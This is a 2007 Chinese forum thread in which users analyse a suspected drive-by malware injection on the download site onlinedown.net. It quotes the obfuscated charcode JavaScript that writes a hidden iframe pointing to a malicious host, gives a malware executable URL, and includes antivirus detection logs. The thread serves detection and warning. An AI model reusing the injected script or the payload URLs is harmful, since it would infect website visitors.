费尔进华军最新软件下载后启发~~~蓝屏

小飞侠.net

h ttp://www.onlinedown.net/new/n0.htm

原先是想截张图片，再按f5确认是不是华军被挂了马时，费尔启发二个还没有看清就蓝屏了。

capsshift

不知道是不是误报，小红伞无反应。

小飞侠.net

原帖由 capsshift 于 2007-9-9 01:51 发表
不知道是不是误报，小红伞无反应。

以下是FF样本区分析..确实有

华军页面 ht tp://www.onlinedown.net/soft/6823.htm
时有时无
有的话
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,50,48,45,48,57,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');document.write(t);</script>

解密后
<script>t='60iframe src=ht tp://free.20-09.cn/error.htm width=100 height=0></iframe>';t=eval('String.fromCharCode('+t+')');document.write(t);</script>

下载
ht tp://www.yx456.com.cn/sg/vip.exe

=.= 华军这个好像是arp所致..

1688388728

检测到：恶意程序 Exploit.HTML.IframeBof        脚本: http://www.onlinedown.net/new/n0.htm[2]
检测到：恶意程序 Exploit.Win32.IMG-ANI.gen (修改)        URL: http://free.20-09.cn/ah.c
检测到：病毒 Virus.Win32.AutoRun.ky        URL: http://free.20-09.cn/vip.exe//NSPack//PE_Patch.MaskPE

小动作
修改文件      操作:阻止
进程路径:D:\Program Files\Maxthon-v2.022961\Maxthon.exe
文件路径:C:\WINDOWS\system32\drivers\etc\hosts
触发规则:所有程序规则->文件规则->%WinDir%\system32\drivers\etc\*

[ 本帖最后由 1688388728 于 2007-9-9 14:18 编辑 ]

风雪

昨天华军不会有事吧。没有装杀毒软件那。。。。。。

hj5abc

capsshift

不知道为什么，我下载楼上列出的东西，很多打不开，一个去了绅博，只有一个AH.C下来红伞报了。
华军再去，红伞还是没反应。

小飞侠.net

原帖由 capsshift 于 2007-9-9 10:22 发表
不知道为什么，我下载楼上列出的东西，很多打不开，一个去了绅博，只有一个AH.C下来红伞报了。
华军再去，红伞还是没反应。

可能被华军管理员杀毒乐～～

king6808

检测到：恶意程序 Exploit.HTML.IframeBof        脚本: http://www.onlinedown.net/new/n0.htm[2]
检测到：恶意程序 Exploit.Win32.IMG-ANI.gen (修改)        URL: http://free.20-09.cn/ah.c
检测到：病毒 Virus.Win32.AutoRun.ky        URL: http://free.20-09.cn/vip.exe//NSPack//PE_Patch.MaskPE